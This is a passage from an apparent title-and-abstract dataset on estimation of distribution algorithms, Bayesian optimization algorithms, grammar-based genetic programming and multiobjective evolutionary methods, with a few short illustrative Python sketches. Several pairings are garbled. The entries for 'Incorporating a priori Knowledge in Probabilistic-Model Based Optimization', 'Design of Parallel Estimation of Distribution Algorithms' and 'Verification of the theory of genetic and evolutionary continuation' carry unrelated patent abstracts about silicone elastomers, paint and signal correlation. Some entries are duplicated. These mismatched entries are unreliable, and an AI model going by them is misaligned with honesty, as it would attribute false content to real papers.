(i.e., subspace, subproblem), and draw the offspring by an independent subspace-based sampling. Experimental results show that the rBOA finds, with a sublinear scale-up behavior for decomposable problems, a solution that is superior in quality to that found by a mixed iterative density-estimation evolutionary algorithm (mIDEA) as the problem size grows. 
Moreover, the rBOA generally outperforms the mIDEA on well-known benchmarks for real-valued optimization. --- paper_title: A Mixed Bayesian Optimization Algorithm with variance adaptation paper_content: This paper presents a hybrid evolutionary optimization strategy combining the Mixed Bayesian Optimization Algorithm (MBOA) with variance adaptation as implemented in Evolution Strategies. This new approach is intended to circumvent some of the deficiencies of MBOA with unimodal functions and to enhance its adaptivity. The Adaptive MBOA algorithm - AMBOA - is compared with the Covariance Matrix Adaptation Evolution Strategy (CMA-ES). The comparison shows that, in continuous domains, AMBOA is more efficient than the original MBOA algorithm and its performance on separable unimodal functions is comparable to that of CMA-ES. --- paper_title: Grammar model-based program evolution paper_content: In evolutionary computation, genetic operators, such as mutation and crossover, are employed to perturb individuals to generate the next population. However these fixed, problem independent genetic operators may destroy the sub-solution, usually called building blocks, instead of discovering and preserving them. One way to overcome this problem is to build a model based on the good individuals, and sample this model to obtain the next population. There is a wide range of such work in genetic algorithms; but because of the complexity of the genetic programming (GP) tree representation, little work of this kind has been done in GP. In this paper, we propose a new method, grammar model-based program evolution (GMPE), to evolve GP programs. We replace common GP genetic operators with a stochastic context-free grammar (SCFG). In each generation, an SCFG is learnt, and a new population is generated by sampling this SCFG model. On two benchmark problems we have studied, GMPE significantly outperforms conventional GP, learning faster and more reliably. --- paper_title: An information measure for classification paper_content: 1. The class to which each thing belongs. 2. The average properties of each class. 3. The deviations of each thing from the average properties of its parent class. If the things are found to be concentrated in a small area of the region of each class in the measurement space then the deviations will be small, and with reference to the average class properties most of the information about a thing is given by naming the class to which it belongs. In this case the information may be recorded much more briefly than if a classification had not been used. We suggest that the best classification is that which results in the briefest recording of all the attribute information. In this context, we will regard the measurements of each thing as being a message about that thing. Shannon (1948) showed that where messages may be regarded as each nominating the occurrence of a particular event among a universe of possible events, the information needed to record a series of such messages is minimised if the messages are encoded so that the length of each message is proportional to minus the logarithm of the relative frequency of occurrence of the event which it nominates. The information required is greatest when all frequencies are equal. The messages here nominate the positions in measurement space of the S points representing the attributes of the things.
If the expected density of points in the measurement space is everywhere uniform, the positions of the points cannot be encoded more briefly than by a simple list of the measured values. However, if the expected density is markedly non-uniform, application --- paper_title: Avoiding the Bloat with Stochastic Grammar-based Genetic Programming paper_content: The application of Genetic Programming to the discovery of empirical laws is often impaired by the huge size of the search space, and consequently by the computer resources needed. In many cases, the extreme demand for memory and CPU is due to the massive growth of non-coding segments, the introns. The paper presents a new program evolution framework which combines distribution-based evolution in the PBIL spirit, with grammar-based genetic programming; the information is stored as a probability distribution on the grammar rules, rather than in a population. Experiments on a real-world like problem show that this approach gives a practical solution to the problem of introns growth. --- paper_title: Genetic Programming: On the Programming of Computers by Means of Natural Selection paper_content: Background on genetic algorithms, LISP, and genetic programming hierarchical problem-solving introduction to automatically-defined functions - the two-boxes problem problems that straddle the breakeven point for computational effort Boolean parity functions determining the architecture of the program the lawnmower problem the bumblebee problem the increasing benefits of ADFs as problems are scaled up finding an impulse response function artificial ant on the San Mateo trail obstacle-avoiding robot the minesweeper problem automatic discovery of detectors for letter recognition flushes and four-of-a-kinds in a pinochle deck introduction to biochemistry and molecular biology prediction of transmembrane domains in proteins prediction of omega loops in proteins lookahead version of the transmembrane problem evolutionary selection of the architecture of the program evolution of primitives and sufficiency evolutionary selection of terminals evolution of closure simultaneous evolution of architecture, primitive functions, terminals, sufficiency, and closure the role of representation and the lens effect. Appendices: list of special symbols list of special functions list of type fonts default parameters computer implementation annotated bibliography of genetic programming electronic mailing list and public repository. --- paper_title: Probabilistic Incremental Program Evolution: Stochastic Search Through Program Space paper_content: Probabilistic Incremental Program Evolution (PIPE) is a novel technique for automatic program synthesis. We combine probability vector coding of program instructions [Schmidhuber, 1997], Population-Based Incremental Learning (PBIL) [Baluja and Caruana, 1995] and tree-coding of programs used in variants of Genetic Programming (GP) [Cramer, 1985; Koza, 1992]. PIPE uses a stochastic selection method for successively generating better and better programs according to an adaptive "probabilistic prototype tree". No crossover operator is used. We compare PIPE to Koza's GP variant on a function regression problem and the 6-bit parity problem. 
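Several of the entries above build on PBIL's incremental model update. As a point of reference, the sketch below shows a standard PBIL-style update of a probability vector toward the best sampled solution. It is a minimal rendering of the general scheme; the learning rate, population size, and test function are arbitrary choices made here for the example.

    import numpy as np

    def pbil_step(prob, fitness, n_samples, learning_rate, rng):
        """Sample binary solutions from the probability vector, then shift the
        vector toward the best sample (the core PBIL update)."""
        samples = (rng.random((n_samples, prob.size)) < prob).astype(int)
        best = samples[np.argmax([fitness(s) for s in samples])]
        return (1.0 - learning_rate) * prob + learning_rate * best

    onemax = lambda s: s.sum()
    rng = np.random.default_rng(2)
    p = np.full(20, 0.5)
    for _ in range(50):
        p = pbil_step(p, onemax, n_samples=30, learning_rate=0.1, rng=rng)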
--- paper_title: Combining Convergence and Diversity in Evolutionary Multiobjective Optimization paper_content: Over the past few years, the research on evolutionary algorithms has demonstrated their niche in solving multiobjective optimization problems, where the goal is to find a number of Pareto-optimal solutions in a single simulation run. Many studies have depicted different ways evolutionary algorithms can progress towards the Pareto-optimal set with a widely spread distribution of solutions. However, none of the multiobjective evolutionary algorithms (MOEAs) has a proof of convergence to the true Pareto-optimal solutions with a wide diversity among the solutions. In this paper, we discuss why a number of earlier MOEAs do not have such properties. Based on the concept of e-dominance, new archiving strategies are proposed that overcome this fundamental problem and provably lead to MOEAs that have both the desired convergence and distribution properties. A number of modifications to the baseline algorithm are also suggested. The concept of e-dominance introduced in this paper is practical and should make the proposed algorithms useful to researchers and practitioners alike. --- paper_title: A new epsilon-dominance hierarchical Bayesian optimization algorithm for large multiobjective monitoring network design problems paper_content: This study focuses on the development of a next generation multiobjective evolutionary algorithm (MOEA) that can learn and exploit complex interdependencies and/or correlations between decision variables in monitoring design applications to provide more robust performance for large problems (defined in terms of both the number of objectives and decision variables). The proposed MOEA is termed the epsilon-dominance hierarchical Bayesian optimization algorithm (e-hBOA), which is representative of a new class of probabilistic model building evolutionary algorithms. The e-hBOA has been tested relative to a top-performing traditional MOEA, the epsilon-dominance nondominated sorted genetic algorithm II (e-NSGAII) for solving a four-objective LTM design problem. A comprehensive performance assessment of the e-NSGAII and various configurations of the e-hBOA have been performed for both a 25 well LTM design test case (representing a relatively small problem with over 33 million possible designs), and a 58 point LTM design test case (with over 2.88 × 10^17 possible designs). The results from this comparison indicate that the model building capability of the e-hBOA greatly enhances its performance relative to the e-NSGAII, especially for large monitoring design problems. This work also indicates that decision variable interdependencies appear to have a significant impact on the overall mathematical difficulty of the monitoring network design problem. --- paper_title: A Mixed Bayesian Optimization Algorithm with variance adaptation paper_content: This paper presents a hybrid evolutionary optimization strategy combining the Mixed Bayesian Optimization Algorithm (MBOA) with variance adaptation as implemented in Evolution Strategies. This new approach is intended to circumvent some of the deficiencies of MBOA with unimodal functions and to enhance its adaptivity. The Adaptive MBOA algorithm - AMBOA - is compared with the Covariance Matrix Adaptation Evolution Strategy (CMA-ES).
The comparison shows that, in continuous domains, AMBOA is more efficient than the original MBOA algorithm and its performance on separable unimodal functions is comparable to that of CMA-ES. --- paper_title: Comparative analysis of multiobjective evolutionary algorithms for random and correlated instances of multiobjective d-dimensional knapsack problems paper_content: This study analyzes multiobjective d-dimensional knapsack problems (MOd-KP) within a comparative analysis of three multiobjective evolutionary algorithms (MOEAs): the e-nondominated sorted genetic algorithm II (e-NSGAII), the strength Pareto evolutionary algorithm 2 (SPEA2) and the e-nondominated hierarchical Bayesian optimization algorithm (e-hBOA). This study contributes new insights into the challenges posed by correlated instances of the MOd-KP that better capture the decision interdependencies often present in real world applications. A statistical performance analysis of the algorithms uses the unary e-indicator, the hypervolume indicator and success rate plots to demonstrate their relative effectiveness, efficiency, and reliability for the MOd-KP instances analyzed. Our results indicate that the e-hBOA achieves superior performance relative to e-NSGAII and SPEA2 with increasing number of objectives, number of decisions, and correlative linkages between the two. Performance of the e-hBOA suggests that probabilistic model building evolutionary algorithms have significant promise for expanding the size and scope of challenging multiobjective problems that can be explored. --- paper_title: Bayesian Optimization Algorithms for Multi-objective Optimization paper_content: In recent years, several researchers have concentrated on using probabilistic models in evolutionary algorithms. These Estimation Distribution Algorithms (EDA) incorporate methods for automated learning of correlations between variables of the encoded solutions. The process of sampling new individuals from a probabilistic model respects these mutual dependencies such that disruption of important building blocks is avoided, in comparison with classical recombination operators. The goal of this paper is to investigate the usefulness of this concept in multi-objective optimization, where the aim is to approximate the set of Pareto-optimal solutions. We integrate the model building and sampling techniques of a special EDA called Bayesian Optimization Algorithm, based on binary decision trees, into an evolutionary multi-objective optimizer using a special selection scheme. The behavior of the resulting Bayesian Multi-objective Optimization Algorithm (BMOA) is empirically investigated on the multi-objective knapsack problem. --- paper_title: Multi-Objective Bayesian Optimization Algorithm paper_content: Recently, significant development in the theory and design of competent genetic algorithms (GAs) has been achieved. By competent GA we mean genetic algorithms that can solve boundedly difficult problems quickly, accurately, and reliably. However, most of the existing competent GAs focus only on single-objective optimization although many real-world problems contain more than one objective. Independently of the development of competent genetic algorithms, a number of approaches to solve such multiobjective problems have been proposed. However, there has been little or no effort to develop competent multiobjective operators that efficiently identify, propagate, and combine important partial solutions of the problem at hand.
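The epsilon-dominance relation used by several of the multiobjective algorithms above can be stated compactly in code. The function below is a generic sketch assuming minimization of all objectives and an additive epsilon; it is not an excerpt from any of the cited implementations, and some papers state the relation with an extra strict-inequality condition.

    def epsilon_dominates(a, b, eps):
        """Additive epsilon-dominance for minimization: a epsilon-dominates b if,
        after relaxing b by eps in every objective, a is at least as good everywhere.
        (Some formulations also require strict improvement in one objective.)"""
        return all(ai <= bi + eps for ai, bi in zip(a, b))

    # Example: with eps = 0.1 the first objective vector epsilon-dominates the second.
    print(epsilon_dominates((1.0, 2.0), (1.05, 2.5), eps=0.1))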
--- paper_title: Multi-objective Optimization with the Naive MIDEA paper_content: Summary. EDAs have been shown to perform well on a wide variety of single-objective optimization problems, for binary and real-valued variables. In this chapter we look into the extension of the EDA paradigm to multi-objective optimization. To this end, we focus the chapter around the introduction of a simple, but effective, EDA for multi-objective optimization: the naive MIDEA (mixture-based multi-objective iterated density-estimation evolutionary algorithm). The probabilistic model in this specific algorithm is a mixture distribution. Each component in the mixture is a univariate factorization. As will be shown in this chapter, mixture distributions allow for wide-spread exploration of a multi-objective front, whereas most operators focus on a specific part of the multi-objective front. This wide-spread exploration aids the important preservation of diversity in multi-objective optimization. To further improve and maintain the diversity that is obtained by the mixture distribution, a specialized diversity preserving selection operator is used in the naive MIDEA. We verify the effectiveness of the naive MIDEA in two different problem domains and compare it with two other well-known efficient multi-objective evolutionary algorithms (MOEAs). --- paper_title: Multiobjective hBOA, clustering, and scalability paper_content: This paper describes a scalable algorithm for solving multiobjective decomposable problems by combining the hierarchical Bayesian optimization algorithm (hBOA) with the nondominated sorting genetic algorithm (NSGA-II) and clustering in the objective space. It is first argued that for good scalability, clustering or some other form of niching in the objective space is necessary and the size of each niche should be approximately equal. Multiobjective hBOA (mohBOA) is then described that combines hBOA, NSGA-II and clustering in the objective space. The algorithm mohBOA differs from the multiobjective variants of BOA and hBOA proposed in the past by including clustering in the objective space and allocating an approximately equally sized portion of the population to each cluster. The algorithm mohBOA is shown to scale up well on a number of problems on which standard multiobjective evolutionary algorithms perform poorly. --- paper_title: Optimization of Computer Simulation Models with Rare Events paper_content: Discrete event simulation systems (DESS) are widely used in many diverse areas such as computer-communication networks, flexible manufacturing systems, project evaluation and review techniques (PERT), and flow networks. Because of their complexity, such systems are typically analyzed via Monte Carlo simulation methods. This paper deals with optimization of complex computer simulation models involving rare events. A classic example is to find an optimal (s, S) policy in a multi-item, multicommodity inventory system, when quality standards require the backlog probability to be extremely small. Our approach is based on change of the probability measure techniques, also called likelihood ratio (LR) and importance sampling (IS) methods. Unfortunately, for arbitrary probability measures the LR estimators and the resulting optimal solution often tend to be unstable and may have large variances. Therefore, the choice of the corresponding importance sampling distribution and in particular its parameters in an optimal way is an important task. 
We consider the case where the IS distribution comes from the same parametric family as the original (true) one and use the stochastic counterpart method to handle simulation based optimization models. More specifically, we use a two-stage procedure: at the first stage we identify (estimate) the optimal parameter vector at the IS distribution, while at the second stage we estimate the optimal solution of the underlying constrained optimization problem. Particular emphasis will be placed on estimation of rare events and on integration of the associated performance function into stochastic optimization programs. Supporting numerical results are provided as well. --- paper_title: Genetic Algorithms and the Optimal Allocation of Trials paper_content: This study gives a formal setting to the difficult optimization problems characterized by the conjunction of (1) substantial complexity and initial uncertainty, (2) the necessity of acquiring new i... --- paper_title: RM-MEDA: A Regularity Model-Based Multiobjective Estimation of Distribution Algorithm paper_content: Under mild conditions, it can be induced from the Karush-Kuhn-Tucker condition that the Pareto set, in the decision space, of a continuous multiobjective optimization problem is a piecewise continuous (m - 1)-D manifold, where m is the number of objectives. Based on this regularity property, we propose a regularity model-based multiobjective estimation of distribution algorithm (RM-MEDA) for continuous multiobjective optimization problems with variable linkages. At each generation, the proposed algorithm models a promising area in the decision space by a probability distribution whose centroid is a (m - 1)-D piecewise continuous manifold. The local principal component analysis algorithm is used for building such a model. New trial solutions are sampled from the model thus built. A nondominated sorting-based selection is used for choosing solutions for the next generation. Systematic experiments have shown that, overall, RM-MEDA outperforms three other state-of-the-art algorithms, namely, GDE3, PCX-NSGA-II, and MIDEA, on a set of test instances with variable linkages. We have demonstrated that, compared with GDE3, RM-MEDA is not sensitive to algorithmic parameters, and has good scalability to the number of decision variables in the case of nonlinear variable linkages. A few shortcomings of RM-MEDA have also been identified and discussed in this paper. --- paper_title: Incorporating a priori Knowledge in Probabilistic-Model Based Optimization paper_content: This invention provides heat curable compositions comprising a high viscosity, peroxide curable polydiorganosiloxane, a relatively low viscosity liquid diorganoalkenylsiloxy endblocked polydiorganosiloxane, a reinforcing filler and an effective amount of a vinyl specific organic peroxide. The tensile and recovery properties of the cured elastomer are optimized when the concentration of diorganoalkenylsiloxy groups on the liquid polydiorganosiloxane relative to the concentration of repeating units in the peroxide curable polydiorganosiloxane is within specified limits. --- paper_title: Using Previous Models to Bias Structural Learning in the Hierarchical BOA paper_content: Estimation of distribution algorithms (EDAs) are stochastic optimization techniques that explore the space of potential solutions by building and sampling explicit probabilistic models of promising candidate solutions. 
While the primary goal of applying EDAs is to discover the global optimum or at least its accurate approximation, besides this, any EDA provides us with a sequence of probabilistic models, which in most cases hold a great deal of information about the problem. Although using problem-specific knowledge has been shown to significantly improve performance of EDAs and other evolutionary algorithms, this readily available source of problem-specific information has been practically ignored by the EDA community. This paper takes the first step toward the use of probabilistic models obtained by EDAs to speed up the solution of similar problems in the future. More specifically, we propose two approaches to biasing model building in the hierarchical Bayesian optimization algorithm (hBOA) based on knowledge automatically learned from previous hBOA runs on similar problems. We show that the proposed methods lead to substantial speedups and argue that the methods should work well in other applications that require solving a large number of problems with similar structure. --- paper_title: Searching for Ground States of Ising Spin Glasses with Hierarchical BOA and Cluster Exact Approximation paper_content: Summary. This chapter applies the hierarchical Bayesian optimization algorithm (hBOA) to the problem of finding ground states of Ising spin glasses with ±J and Gaussian couplings in two and three dimensions. The performance of hBOA is compared to that of the simple genetic algorithm (GA) and the univariate marginal distribution algorithm (UMDA). The performance of all tested algorithms is improved by incorporating a deterministic hill climber based on single-bit flips. The results show that hBOA significantly outperforms GA and UMDA on a broad spectrum of spin glass instances. Cluster exact approximation (CEA) is then described and incorporated into hBOA and GA to improve their efficiency. The results show that CEA enables all tested algorithms to solve larger spin glass instances and that hBOA significantly outperforms other compared algorithms even in this case. --- paper_title: Adaptive Estimation of Distribution Algorithms paper_content: Estimation of distribution algorithms (EDAs) are evolutionary methods that use probabilistic models instead of genetic operators to lead the search. Most of current proposals on EDAs do not incorporate adaptive techniques. Usually, the class of probabilistic model employed as well as the learning and sampling methods are static. In this paper, we present a general framework for introducing adaptation in EDAs. This framework allows the possibility of changing the class of probabilistic models during the evolution. We present a number of measures, and techniques that can be used to evaluate the effect of the EDA components in order to design adaptive EDAs. As a case study we present an adaptive EDA that combines different classes of probabilistic models and sampling methods. The algorithm is evaluated in the solution of the satisfiability problem. --- paper_title: Difficulty of linkage learning in estimation of distribution algorithms paper_content: This paper investigates the difficulty of linkage learning, an essential core, in EDAs. Specifically, it examines allelic-pairwise independent functions including the parity, parity-with-trap, and Walsh-code functions.
While the parity function was believed to be difficult for EDAs in previous work, our experiments indicate that it can be solved by CGA within a polynomial number of function evaluations with respect to the problem size. Consequently, the apparently difficult parity-with-trap function can be easily solved by ECGA, even though the linkage model is incorrect. A convergence model for CGA on the parity function is also derived to verify and support the empirical findings. Finally, this paper proposes a so-called Walsh-code function, which is more difficult than the parity function. Although the proposed function does deceive the linkage-learning mechanism in most EDAs, EDAs are still able to solve it to some extent. --- paper_title: Efficient Linkage Discovery by Limited Probing paper_content: This paper addresses the problem of discovering the structure of a fitness function from binary strings to the reals under the assumption of bounded epistasis. Two loci (string positions) are epistatically linked if the effect of changing the allele (value) at one locus depends on the allele at the other locus. Similarly, a group of loci are epistatically linked if the effect of changing the allele at one locus depends on the alleles at all other loci of the group. Under the assumption that the size of such groups of loci are bounded, and assuming that the function is given only as a "black box function", this paper presents and analyzes a randomized algorithm that finds the complete epistatic structure of the function in the form of the Walsh coefficients of the function. --- paper_title: Linkage Identification by Non-monotonicity Detection for Overlapping Functions paper_content: This paper presents the linkage identification by non-monotonicity detection (LIMD) procedure and its extension for overlapping functions by introducing the tightness detection (TD) procedure. The LIMD identifies linkage groups directly by performing order-2 simultaneous perturbations on a pair of loci to detect monotonicity/non-monotonicity of fitness changes. The LIMD can identify linkage groups with at most order of k when it is applied to O(2^k) strings. The TD procedure calculates tightness of linkage between a pair of loci based on the linkage groups obtained by the LIMD. By removing loci with weak tightness from linkage groups, correct linkage groups are obtained for overlapping functions, which were considered difficult for linkage identification procedures. --- paper_title: Why is parity hard for estimation of distribution algorithms? paper_content: We describe a k-bounded and additively separable test problem on which the hierarchical Bayesian Optimization Algorithm (hBOA) scales exponentially. --- paper_title: Hierarchical Bayesian optimization algorithm: toward a new generation of evolutionary algorithms paper_content: Over the last few decades, genetic and evolutionary algorithms (GEAs) have been successfully applied to many problems of business, engineering, and science. This paper discusses probabilistic model-building genetic algorithms (PMBGAs), which are among the most important directions of current GEA research. PMBGAs replace traditional variation operators of GEAs by learning and sampling a probabilistic model of promising solutions. The paper describes two advanced PMBGAs: the Bayesian optimization algorithm (BOA), and the hierarchical BOA (hBOA).
The paper argues that BOA and hBOA can solve an important class of nearly decomposable and hierarchical problems in a quadratic or subquadratic number of function evaluations with respect to the number of decision variables. --- paper_title: Efficient and Accurate Parallel Genetic Algorithms paper_content: Preface. Acknowledgments. 1. Introduction. 2. The Gambler's Ruin and Population Sizing. 3. Master-Slave Parallel GAs. 4. Bounding Cases of GAs With Multiple Demes. 5. Markov Chain Models of Multiple Demes. 6. Migration Rates and Optimal Topologies. 7. Migration and Selection Pressure. 8. Fine-Grained and Hierarchical Parallel GAs. 9. Summary, Extensions, and Conclusions. References. Index. --- paper_title: Design of Parallel Estimation of Distribution Algorithms paper_content: A long-lasting water-based paint having an exceptional resistance to both chemical and mechanical damage comprises a combination of acrylic resins as pigment binders. Flaked highly corrosion-resistant stainless steel, finely ground mica flakes, calcium carbonate and a small amount of zinc oxide are included in the pigment. The paint is prepared by adding at least approximately 60% of the acrylic resin into the paint after all of the pigment, substantially reducing the amount of air entrapped in the paint during mixing. --- paper_title: Evaluation-relaxation schemes for genetic and evolutionary algorithms paper_content: Genetic and evolutionary algorithms have been increasingly applied to solve complex, large scale search problems with mixed success. Competent genetic algorithms have been proposed to solve hard problems quickly, reliably and accurately. They have rendered problems that were difficult to solve by the earlier GAs to be solvable, requiring only a subquadratic number of function evaluations. To facilitate solving large-scale complex problems, and to further enhance the performance of competent GAs, various efficiency-enhancement techniques have been developed. This study investigates one such class of efficiency-enhancement technique called evaluation relaxation. Evaluation-relaxation schemes replace a high-cost, low-error fitness function with a low-cost, high-error fitness function. The error in fitness functions comes in two flavors: bias and variance. The presence of bias and variance in fitness functions is considered in isolation and strategies for increasing efficiency in both cases are developed. Specifically, approaches for choosing between two fitness functions with either differing variance or differing bias values have been developed. This thesis also investigates fitness inheritance as an evaluation-relaxation scheme. In fitness inheritance, the fitness values of some individuals are inherited from their parents rather than through a costly evaluation function, thereby reducing the total function-evaluation cost. Simple facetwise models have been derived to capture the dynamics in each case and have been verified with simple but illustrative empirical results. These models are also used to develop an analytical framework to tune algorithm parameters to obtain maximum speed-up. --- paper_title: Efficiency Enhancement of Genetic Algorithms via Building-Block-Wise Fitness Estimation paper_content: This paper studies fitness inheritance as an efficiency enhancement technique for a class of competent genetic algorithms called estimation distribution algorithms.
Probabilistic models of important sub-solutions are developed to estimate the fitness of a proportion of individuals in the population, thereby avoiding computationally expensive function evaluations. The effect of fitness inheritance on the convergence time and population sizing are modeled and the speed-up obtained through inheritance is predicted. The results show that a fitness-inheritance mechanism which utilizes information on building-block fitnesses provides significant efficiency enhancement. For additively separable problems, fitness inheritance reduces the number of function evaluations to about half and yields a speed-up of about 1.75-2.25. --- paper_title: Don’t Evaluate, Inherit paper_content: This paper studies fitness inheritance as an efficiency enhancement technique for genetic and evolutionary algorithms. Convergence and population-sizing models are derived and compared with experimental results. These models are optimized for greatest speed-up and the optimal inheritance proportion to obtain such a speed-up is derived. Results on OneMax problems show that when the inheritance effects are considered in the population-sizing model, the number of function evaluations are reduced by 20% with the use of fitness inheritance. Results indicate that for a fixed population size, the number of function evaluations can be reduced by 70% using a simple fitness inheritance technique. --- paper_title: Efficient Genetic Algorithms Using Discretization Scheduling paper_content: In many applications of genetic algorithms, there is a tradeoff between speed and accuracy in fitness evaluations when evaluations use numerical methods with varying discretization. In these types of applications, the cost and accuracy vary from discretization errors when implicit or explicit quadrature is used to estimate the function evaluations. This paper examines discretization scheduling, or how to vary the discretization within the genetic algorithm in order to use the least amount of computation time for a solution of a desired quality. The effectiveness of discretization scheduling can be determined by comparing its computation time to the computation time of a GA using a constant discretization. There are three ingredients for the discretization scheduling: population sizing, estimated time for each function evaluation and predicted convergence time analysis. Idealized one- and two-dimensional experiments and an inverse groundwater application illustrate the computational savings to be achieved from using discretization scheduling. --- paper_title: A Maximum Entropy Approach to Sampling in EDA – The Single Connected Case paper_content: The success of evolutionary algorithms, in particular Factorized Distribution Algorithms (FDA), for many pattern recognition tasks heavily depends on our ability to reduce the number of function evaluations. --- paper_title: Designing Competent Mutation Operators via Probabilistic Model Building of Neighborhoods paper_content: This paper presents a competent selectomutative genetic algorithm (GA), that adapts linkage and solves hard problems quickly, reliably, and accurately. A probabilistic model building process is used to automatically identify key building blocks (BBs) of the search problem. The mutation operator uses the probabilistic model of linkage groups to find the best among competing building blocks. 
The competent selectomutative GA successfully solves additively separable problems of bounded difficulty, requiring only a subquadratic number of function evaluations. The results show that for additively separable problems the probabilistic model building BB-wise mutation scales as \({\mathcal{O}}(2^km^{1.5})\), and requires \({\mathcal{O}}(\sqrt{k}\log m)\) fewer function evaluations than its selectorecombinative counterpart, confirming theoretical results reported elsewhere [1]. --- paper_title: Loopy Substructural Local Search for the Bayesian Optimization Algorithm paper_content: This paper presents a local search method for the Bayesian optimization algorithm (BOA) based on the concepts of substructural neighborhoods and loopy belief propagation. The probabilistic model of BOA, which automatically identifies important problem substructures, is used to define the topology of the neighborhoods explored in local search. On the other hand, belief propagation in graphical models is employed to find the most suitable configuration of conflicting substructures. The results show that performing loopy substructural local search (SLS) in BOA can dramatically reduce the number of generations necessary to converge to optimal solutions and thus provides substantial speedups. --- paper_title: The effectiveness of mutation operation in the case of Estimation of Distribution Algorithms paper_content: The Estimation of Distribution Algorithms are a class of evolutionary algorithms which adopt probabilistic models to reproduce individuals in the next generation, instead of conventional crossover and mutation operators. In this paper, mutation operators are incorporated into Estimation of Distribution Algorithms in order to maintain diversity in EDA populations. Two kinds of mutation operators are examined: a bitwise mutation operator and a mutation operator taking the probabilistic model into account. In experiments, we not only compare the proposed methods with conventional EDAs on a few fitness functions but also analyze sampled probabilistic models by using KL-divergence. The experimental results shown in this paper elucidate that the mutation operator taking the probabilistic model into account improves the search ability of EDAs. --- paper_title: Searching for Ground States of Ising Spin Glasses with Hierarchical BOA and Cluster Exact Approximation paper_content: Summary. This chapter applies the hierarchical Bayesian optimization algorithm (hBOA) to the problem of finding ground states of Ising spin glasses with ±J and Gaussian couplings in two and three dimensions. The performance of hBOA is compared to that of the simple genetic algorithm (GA) and the univariate marginal distribution algorithm (UMDA). The performance of all tested algorithms is improved by incorporating a deterministic hill climber based on single-bit flips. The results show that hBOA significantly outperforms GA and UMDA on a broad spectrum of spin glass instances. Cluster exact approximation (CEA) is then described and incorporated into hBOA and GA to improve their efficiency. The results show that CEA enables all tested algorithms to solve larger spin glass instances and that hBOA significantly outperforms other compared algorithms even in this case. --- paper_title: A parallel framework for loopy belief propagation paper_content: There are many innovative proposals introduced in the literature under the evolutionary computation field, of which estimation of distribution algorithms (EDAs) is one.
Their main characteristic is the use of probabilistic models to represent the (in)dependencies between the variables of a concrete problem. Such probabilistic models have also been applied to the theoretical analysis of EDAs, providing a platform for the implementation of other optimization methods that can be incorporated into the EDA framework. Some of these methods, typically used for probabilistic inference, are belief propagation algorithms. In this paper we present a parallel approach for one of these inference-based algorithms, the loopy belief propagation algorithm for factor graphs. Our parallel implementation was designed to provide an algorithm that can be executed in clusters of computers or multiprocessors in order to reduce the total execution time. In addition, this framework was also designed as a flexible tool where many parameters, such as scheduling rules or stopping criteria, can be adjusted according to the requirements of each particular experiment and problem. --- paper_title: The Factorized Distribution Algorithm and the Minimum Relative Entropy Principle paper_content: We assume that the function to be optimized is additively decomposed (ADF). Then the interaction graph $G_{ADF}$ can be used to compute exact or approximate factorizations. For many practical problems only approximate factorizations lead to efficient optimization algorithms. The relation between the approximation used by the FDA algorithm and the minimum relative entropy principle is discussed. A new algorithm is presented, derived from the Bethe-Kikuchi approach in statistical physics. It minimizes the relative entropy to a Boltzmann distribution with fixed $\beta$. We shortly compare different factorizations and algorithms within the FDA software. We use 2-d Ising spin glass problems and Kauffman's n-k function as examples. --- paper_title: Verification of the theory of genetic and evolutionary continuation paper_content: A few cycles of an input signal are correlated, or compared, with a few cycles of the input signal received at a previous interval and the interval is varied when correlation, or a positive comparison, has been obtained with the apparatus providing an output or detection signal after a predetermined number of correlations have occurred. --- paper_title: Let's Get Ready to Rumble: Crossover Versus Mutation Head to Head paper_content: This paper analyzes the relative advantages between crossover and mutation on a class of deterministic and stochastic additively separable problems. This study assumes that the recombination and mutation operators have the knowledge of the building blocks (BBs) and effectively exchange or search among competing BBs. Facetwise models of convergence time and population sizing have been used to determine the scalability of each algorithm. The analysis shows that for additively separable deterministic problems, the BB-wise mutation is more efficient than crossover, while the crossover outperforms the mutation on additively separable problems perturbed with additive Gaussian noise. The results show that the speed-up of using BB-wise mutation on deterministic problems is \({\mathcal{O}}(\sqrt{k}\log m)\), where k is the BB size, and m is the number of BBs. Likewise, the speed-up of using crossover on stochastic problems with fixed noise variance is \({\mathcal{O}}(m\sqrt{k}/\log m)\).
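Several of the entries above relate EDA search distributions to Boltzmann distributions with a fixed inverse temperature. For a tiny problem this target distribution can be written out exactly; the toy sketch below, provided only as an illustration and not drawn from the cited work, enumerates all bitstrings, forms p(x) proportional to exp(beta * f(x)), and samples from it. This is the idealized distribution that factorized approximations such as FDA aim to track; real algorithms of course never enumerate the search space.

    import numpy as np
    from itertools import product

    def boltzmann_sample(fitness, n_vars, beta, n_samples, rng):
        """Exact Boltzmann distribution over all 2**n_vars bitstrings (only viable
        for very small n_vars); p(x) is proportional to exp(beta * fitness(x))."""
        states = np.array(list(product((0, 1), repeat=n_vars)))
        weights = np.exp(beta * np.array([fitness(s) for s in states]))
        probs = weights / weights.sum()
        idx = rng.choice(len(states), size=n_samples, p=probs)
        return states[idx]

    rng = np.random.default_rng(3)
    onemax = lambda s: s.sum()
    samples = boltzmann_sample(onemax, n_vars=10, beta=2.0, n_samples=5, rng=rng)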
--- paper_title: Using Time Efficiently: Genetic-Evolutionary Algorithms and the Continuation Problem paper_content: This paper develops a macro-level theory of efficient time utilization for genetic and evolutionary algorithms. Building on population sizing results that estimate the critical relationship between solution quality and time, the paper considers the tradeoff between large populations that converge in a single convergence epoch and smaller populations with multiple epochs. Two models suggest a link between the salience structure of a problem and the appropriate population-time configuration for best efficiency. --- paper_title: Evolutionary optimization and the estimation of search distributions with applications to graph bipartitioning paper_content: Abstract We present a theory of population based optimization methods using approximations of search distributions. We prove convergence of the search distribution to the global optima for the factorized distribution algorithm (FDA) if the search distribution is a Boltzmann distribution and the size of the population is large enough. Convergence is defined in a strong sense––the global optima are attractors of a dynamical system describing mathematically the algorithm. We investigate an adaptive annealing schedule and show its similarity to truncation selection. The inverse temperature β is changed inversely proportionally to the standard deviation of the population. We extend FDA by using a Bayesian hyper-parameter. The hyper-parameter is related to mutation in evolutionary algorithms. We derive an upper bound on the hyper-parameter to ensure that FDA still generates the optima with high probability. We discuss the relation of the FDA approach to methods used in statistical physics to approximate a Boltzmann distribution and to belief propagation in probabilistic reasoning. In the last part are sparsely connected. Our empirical results are as good or even better than any other method used for this problem. --- paper_title: Incorporating a priori Knowledge in Probabilistic-Model Based Optimization paper_content: This invention provides heat curable compositions comprising a high viscosity, peroxide curable polydiorganosiloxane, a relatively low viscosity liquid diorganoalkenylsiloxy endblocked polydiorganosiloxane, a reinforcing filler and an effective amount of a vinyl specific organic peroxide. The tensile and recovery properties of the cured elastomer are optimized when the concentration of diorganoalkenylsiloxy groups on the liquid polydiorganosiloxane relative to the 